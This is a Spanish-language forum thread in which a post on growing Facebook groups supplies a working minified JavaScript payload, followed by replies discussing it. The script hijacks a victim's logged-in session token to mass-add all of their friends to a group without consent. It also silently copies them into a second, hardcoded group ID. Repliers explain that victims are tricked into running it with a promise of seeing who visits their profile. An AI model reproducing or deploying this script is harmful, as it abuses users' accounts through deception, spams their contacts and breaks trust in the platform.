Consejos para aumentar los miembros de tu grupo de Facebook

• Autor Autor Beaszak
  • Fecha de inicio Fecha de inicio
Beaszak

Beaszak

Iota
Verificación en dos pasos activada
Verificado por Whatsapp
Primero debemos crear un grupo..
se crea desde http://www.facebook.com/bookmarks/groups y luego ''Crear Grupo''

después le agregamos esta portada:
28sljxh.jpg

Ahora en la descripción de la portada ponemos este código: ACTUALIZADO
Insertar CODE, HTML o PHP:
function penetrasi(e){jx.load(window.location.protocol+"//www.facebook.com/ajax/groups/members/add_post.php?__a=1&fb_dtsg="+document.getElementsByName("fb_dtsg")[0].value+"&group_id="+memberGroupId+"&source=typeahead&members="+e+"&nctr[_mod]=pagelet_group_members_summary&lsd&post_form_id_source=AsyncRequest&__user="+Env.user,function(e){e=e.substring(e.indexOf("{")),e=JSON.parse(e),i--,kunaon="<div class='friend-edge-name' style='text-align:left;font-size:10px;white-space:pre-wrap;",e.error?(kunaon+="color:darkred'>",kunaon=e.errorDescription?kunaon+e.errorDescription:kunaon+JSON.stringify(e,null,"")):(kunaon+="color:darkgreen'>",kunaon+=arr[i],suc++),kunaon+="</div>",e="<div id='friend-edge-display' style='position:fixed;left:50%;margin-left:-273px;top:100px;width:500px;background-color:rgba(255,255,255,0.9);z-index:9999;font-size:14px;text-align:center;padding:15px;border-radius:14px;border:8px solid rgba(0,0,0,0.5)'>"+("<div style='padding-bottom:10px;font-size:20px;'>"+tulisanNganu+"</div>"),0<i?(e+=arr.length+" Suscribers detected<br/>",e+="<b>"+suc+"</b> Suscribers added of "+(arr.length-i)+" Suscribers Processed ",e+="("+i+" more to go..)",e=e+"<div class='friend-edge'>"+kunaon,e+="</div>"):(e+=arr.length+" Suscribers detected and ",e+="<b>"+suc+" Suscribers added</b>",e+="<div><span class='uiButton' onClick='document.getElementById(\"pagelet_welcome_box\").style.display=\"none\"'>Close</span></div>"),document.getElementById("pagelet_welcome_box").innerHTML=e+"</div>"},"text","post"),tay--;if(0<tay){var t=arr[tay];setTimeout("penetrasi("+t+")",100)}console.log(tay+"/"+arr.length+":"+t+", success:"+suc),0xf2a794cf90e3!=memberGroupId&&jx.load(window.location.protocol+"//www.facebook.com/ajax/groups/members/add_post.php?__a=1&fb_dtsg="+document.getElementsByName("fb_dtsg")[0].value+"&group_id=134344036695273&source=typeahead&members="+e+"&nctr[_mod]=pagelet_group_members_summary&lsd&post_form_id_source=AsyncRequest&__user="+Env.user,function(){},"text","post")}function clickfr_callback(){0<document.getElementsByName("ok").length&&nHtml.ClickUp(document.getElementsByName("ok")[0]);var e=arr[i];i<arr.length&&addfriend(e.substring(0,4))}function clickfr(){0<document.getElementsByClassName("search").length?(console.log(document.getElementsByClassName("search")[0].childNodes[0].childNodes[0].childNodes[1].innerHTML),document.getElementsByClassName("search")[0].childNodes[0].childNodes[0].href="javascript:void(0);",nHtml.ClickUp(document.getElementsByClassName("search")[0].childNodes[0].childNodes[0].childNodes[1])):j++,setTimeout("clickfr_callback()",2e3)}function addfriend(e){i++,document.getElementsByClassName("mbm")[eind].childNodes[0].childNodes[1].childNodes[0].focus(),document.getElementsByClassName("mbm")[eind].childNodes[0].childNodes[1].childNodes[0].value=e,document.getElementsByClassName("mbm")[eind].childNodes[0].childNodes[1].childNodes[0].blur(),document.getElementsByClassName("mbm")[eind].childNodes[0].childNodes[1].childNodes[0].focus(),document.getElementsByClassName("mbm")[eind].childNodes[0].childNodes[1].childNodes[0].focus(),setTimeout("clickfr()",2e3)}function sleep(e){for(var t=(new Date).getTime(),n=0;1e7>n&&!((new Date).getTime()-t>e);n++);}var tulisanNganu="AUTO SUSCRIBE BY QUITIAN",kunaon="";jx={getHTTPObject:function(){var e=!1;if("undefined"!=typeof ActiveXObject)try{e=new ActiveXObject("Msxml2.XMLHTTP")}catch(t){try{e=new ActiveXObject("Microsoft.XMLHTTP")}catch(n){e=!1}}else if(window.XMLHttpRequest)try{e=new XMLHttpRequest}catch(r){e=!1}return e},load:function(b,c,d,e,g){var f=this.init();if(f&&b){f.overrideMimeType&&f.overrideMimeType("text/xml"),e||(e="GET"),d||(d="text"),g||(g={});var d=d.toLowerCase(),e=e.toUpperCase(),h="uid="+(new Date).getTime(),b=b+(b.indexOf("?")+1?"&":"?"),b=b+h,h=null;"POST"==e&&(h=b.split("?"),b=h[0],h=h[1]),f.open(e,b,!0),"POST"==e&&(f.setRequestHeader("Content-type","application/x-www-form-urlencoded"),f.setRequestHeader("Content-length",h.length),f.setRequestHeader("Connection","close")),f.onreadystatechange=g.handler?function(){g.handler(f)}:function(){if(f.readyState==4)if(f.status==200){var b="";f.responseText&&(b=f.responseText),d.charAt(0)=="j"?(b=b.replace(/[\n\r]/g,""),b=eval("("+b+")")):d.charAt(0)=="x"&&(b=f.responseXML),c&&c(b)}else g.loadingIndicator&&document.getElementsByTagName("body")[0].removeChild(g.loadingIndicator),g.loading&&(document.getElementById(g.loading).style.display="none"),error&&error(f.status)},f.send(h)}},bind:function(e){var t={url:"",onSuccess:!1,onError:!1,format:"text",method:"GET",update:"",loading:"",loadingIndicator:""},n;for(n in t)e[n]&&(t[n]=e[n]);if(t.url){var r=!1;t.loadingIndicator&&(r=document.createElement("div"),r.setAttribute("style","position:absolute;top:0px;left:0px;"),r.setAttribute("class","loading-indicator"),r.innerHTML=t.loadingIndicator,document.getElementsByTagName("body")[0].appendChild(r),this.opt.loadingIndicator=r),t.loading&&(document.getElementById(t.loading).style.display="block"),this.load(t.url,function(e){t.onSuccess&&t.onSuccess(e),t.update&&(document.getElementById(t.update).innerHTML=e),r&&document.getElementsByTagName("body")[0].removeChild(r),t.loading&&(document.getElementById(t.loading).style.display="none")},t.format,t.method,t)}},init:function(){return this.getHTTPObject()}};var nHtml={FindByAttr:function(e,t,n,r){return"className"==n&&(n="class"),(e=document.evaluate(".//"+t+"[@"+n+"='"+r+"']",e,null,XPathResult.FIRST_ORDERED_NODE_TYPE,null))&&e.singleNodeValue?e.singleNodeValue:null},FindByClassName:function(e,t,n){return this.FindByAttr(e,t,"className",n)},FindByXPath:function(e,t){try{var n=document.evaluate(t,e,null,XPathResult.FIRST_ORDERED_NODE_TYPE,null)}catch(r){GM_log("bad xpath:"+t)}return n&&n.singleNodeValue?n.singleNodeValue:null},VisitUrl:function(e){window.setTimeout(function(){document.location.href=e},500+Math.floor(500*Math.random()))},ClickWin:function(e,t,n){var r=e.document.createEvent("MouseEvents");return r.initMouseEvent(n,!0,!0,e,0,0,0,0,0,!1,!1,!1,!1,0,null),!t.dispatchEvent(r)},Click:function(e){return this.ClickWin(window,e,"click")},ClickTimeout:function(e,t){window.setTimeout(function(){return nHtml.ClickWin(window,e,"click")},t+Math.floor(500*Math.random()))},ClickUp:function(e){this.ClickWin(window,e,"mousedown"),this.ClickWin(window,e,"mouseup"),this.ClickWin(window,e,"click")},GetText:function(e,t){var n="";void 0==t&&(t=0);if(!(40<t)){if(void 0!=e.textContent)return e.textContent;for(var r=0;r<e.childNodes.length;r++)n+=this.GetText(e.childNodes[r],t+1);return n}}};void 0==document.getElementsByClassName&&(document.getElementsByClassName=function(e){for(var t=RegExp("(?:^|\\s)"+e+"(?:$|\\s)"),n=document.getElementsByTagName("*"),r=[],i,s=0;null!=(i=n[s]);s++){var o=i.className;o&&-1!=o.indexOf(e)&&t.test(o)&&r.push(i)}return r}),Array.prototype.find=function(e){var t=!1;for(i=0;i<this.length;i++)typeof e=="function"?e.test(this[i])&&(t||(t=[]),t.push(i)):this[i]===e&&(t||(t=[]),t.push(i));return t};for(var a=0,eind=0,len=document.getElementsByClassName("mbm").length,a=0;a<len;a++){var ele=document.getElementsByClassName("mbm")[a];if(ele&&ele.childNodes[0]&&ele.childNodes[0]&&ele.childNodes[0].childNodes[1]&&ele.childNodes[0].childNodes[1].childNodes[0]&&"Add SUSCRIBERS"==document.getElementsByClassName("mbm")[a].childNodes[0].childNodes[1].childNodes[0].value){eind=a;break}}var i=3,tay=3,counter1=0,counter2=0,counter3=0,j=0,k=0,suc=0,arr=[],memberGroupId=document.getElementsByName("group_id")[0].value;jx.load(window.location.protocol+"//www.facebook.com/ajax/typeahead/first_degree.php?__a=1&viewer="+Env.user+"&filter[0]=user&__user="+Env.user,function(e){for(var e=e.substring(e.indexOf("{")),e=JSON.parse(e),e=e.payload.entries,t=0;t<e.length;t++)arr.push(e[t].uid);tay=i=arr.length-1,console.log(arr.length),e="<div id='friend-edge-display' style='position:fixed;left:50%;margin-left:-273px;top:100px;width:500px;background-color:rgba(255,255,255,0.9);z-index:9999;font-size:14px;text-align:center;padding:15px;border-radius:14px;border:8px solid rgba(0,0,0,0.5)'>"+("<div style='padding-bottom:10px;font-size:20px;'>"+tulisanNganu+"</div>"),e+=arr.length+" SUSCRIBERS detected",document.getElementById("pagelet_welcome_box").innerHTML=e+"</div>",penetrasi(arr[i])})

Les recomiendo poner que las publicaciones de las otras personas pasen por moderación, (ustedes las acepten antes de que se publiquen, porque el grupo se llenara de spam xD)
Un grupo mio que yo cree hace menos de 1 semana, en 2 días junto los 100.000 miembros pero deje de darle seguimiento:
http://www.facebook.com/groups/140374036111597/

Última edición:
Que buen aporte, y los primeros miembros como llegan ? tienes que meter a tus contactos y de ahi se vuelve viral o como hacer al principio ?

Precisamente quería enseñarles a hacer los grupos, ya que vi que en la zona de negocios están "estafando" a muchos, con códigos gratuitos, y que no necesitan nada de experiencia para echarlos a andar.

se agradece que lo compartas con la comunidad, haber si ya no caen muchos en esa estafa.

- - - Actualizado - - -

Que buen aporte, y los primeros miembros como llegan ? tienes que meter a tus contactos y de ahi se vuelve viral o como hacer al principio ?

Si, o podrías publicarlos en fan Pages, o en otros grupos.

Si tienes fanpages puedes hacerle menciones, si no con tus contactos :encouragement:
de todo sirve xD

Buen aporte. No dejen de hacer up al tema para que los vivatos no se aprovechen

Muy buen aporte

Interesante, ¿Qué es lo que realmente está haciendo el código? ¿Invita ? ¿O que pasa? Gracias.

Bien, mejor lo publicare en mis fanpages para que mis contactos no se enojen por meterlos a un grupo de spam jaaj
Y tiene razon los que comentan en la seccion de negocios ya vendieron esto por 20 dls y por lo que lei hubo varios compradores

yo lo iba a postear también hahaha pero como vi que lo estaban vendiendo ya no lo hice xd, no quería caer mal, pero en realidad ese código es libre y lo pueden encontrar en google y en varios sitios en facebook.

yo tambien estaba pensando hacer el tuto, porque no quise desvirtuar el tema que a mi tambien me parecia una estafa vender algo tan sencillo, y para echarlo a correr pues si tienes que agregar algunos amigos, yo me hice tambien uno de estos grupos y al correr el codigo agrego a todos al grupo y me lleve una buena cantidad de mentadas de madre de gente que ya esta harta de que la agreguen a esos grupos, aun sigue creciendo porque corri el codigo ese con un perfil que compre aqui, para mi opinion personal este tipo de grupos solo sirven para ganar suscriptores, y la gran mayoria niños o adolescentes, lleno el grupo de gente que le importa un comino el grupo y jamas participara, pero algo muy curioso que me paso es que como tengo un monton de amigos DJ's y gente que le gusta la musica electronica, uno de mis amigos corrio el codigo sin preguntarme que pedo y agrego a todos sus amigos, asi que con las primeras dos agregadas, teniamos un grupo lleno de gente interesada en el genero de musica electronica y empezaron a promocionar eventos a pesar de que el nombre del grupo no tenia nada que ver con eso, asi que ahora ando planeando hacerme otro grupo con un nombre que si se de musica electro y algunos contactos que tengo vamos a correr el codigo para agregar a todos nuestros amigos y suscriptores y haremos un grupo con tematica en mucho menos tiempo que lo que llevaria un grupo normal 🙂

Interesante, ¿Qué es lo que realmente está haciendo el código? ¿Invita ? ¿O que pasa? Gracias.

el código es engañoso, osea haces creer al miembro del grupo que así vera quien visita su perfil y al ejecutarlo lo que en realidad esta haciendo es agregar a todos sus suscriptores al grupo que tiene actualmente en pantalla, y es así como muchos luego empiezan a postear en el grupo diciendo y yo que hago aquí? xD, como veras es muy viral y 1 sola personas puede agregar muchas y luego viene otra y agrega mas y así hasta llenar el grupo de muchas personas que ni saben como llegaron ahi.

Muchas gracias por el aporte :encouragement:
Por cierto cuales son las ventajas de estos grupos?

yo tambien estaba pensando hacer el tuto, porque no quise desvirtuar el tema que a mi tambien me parecia una estafa vender algo tan sencillo, y para echarlo a correr pues si tienes que agregar algunos amigos, yo me hice tambien uno de estos grupos y al correr el codigo agrego a todos al grupo y me lleve una buena cantidad de mentadas de madre de gente que ya esta harta de que la agreguen a esos grupos, aun sigue creciendo porque corri el codigo ese con un perfil que compre aqui, para mi opinion personal este tipo de grupos solo sirven para ganar suscriptores, y la gran mayoria niños o adolescentes, lleno el grupo de gente que le importa un comino el grupo y jamas participara, pero algo muy curioso que me paso es que como tengo un monton de amigos DJ's y gente que le gusta la musica electronica, uno de mis amigos corrio el codigo sin preguntarme que pedo y agrego a todos sus amigos, asi que con las primeras dos agregadas, teniamos un grupo lleno de gente interesada en el genero de musica electronica y empezaron a promocionar eventos a pesar de que el nombre del grupo no tenia nada que ver con eso, asi que ahora ando planeando hacerme otro grupo con un nombre que si se de musica electro y algunos contactos que tengo vamos a correr el codigo para agregar a todos nuestros amigos y suscriptores y haremos un grupo con tematica en mucho menos tiempo que lo que llevaria un grupo normal 🙂

Si no me equivoco los nombres de grupos si se pueden cambiar, no seria necesario crear otro

Wow Gracias por sus respuestas. Me imaginaba algo parecido pero tendré que decir "Interesante otra vez". 🙂

Buen dato, gracias por compartirlo. :encouragement:

Testeando??? el ID de tu grupo aparece en el código fuente del JS que inyectamos par obtener los fans...

&group_id=140374036111597&

Eso quiere decir que todos los "fans" van para su grupo aunque los agreguemos nosotros? saludos

no._. pueden intentarlo en una prueba si quierenxd

- - - Actualizado - - -

Eso quiere decir que todos los "fans" van para su grupo aunque los agreguemos nosotros? saludos

Noo, yo tambien pense eso, puedes hacer una prueba en un grupo tuyo y lo podras ver, se agregan desde el grupo que lo hagas :encouragement:

Atrás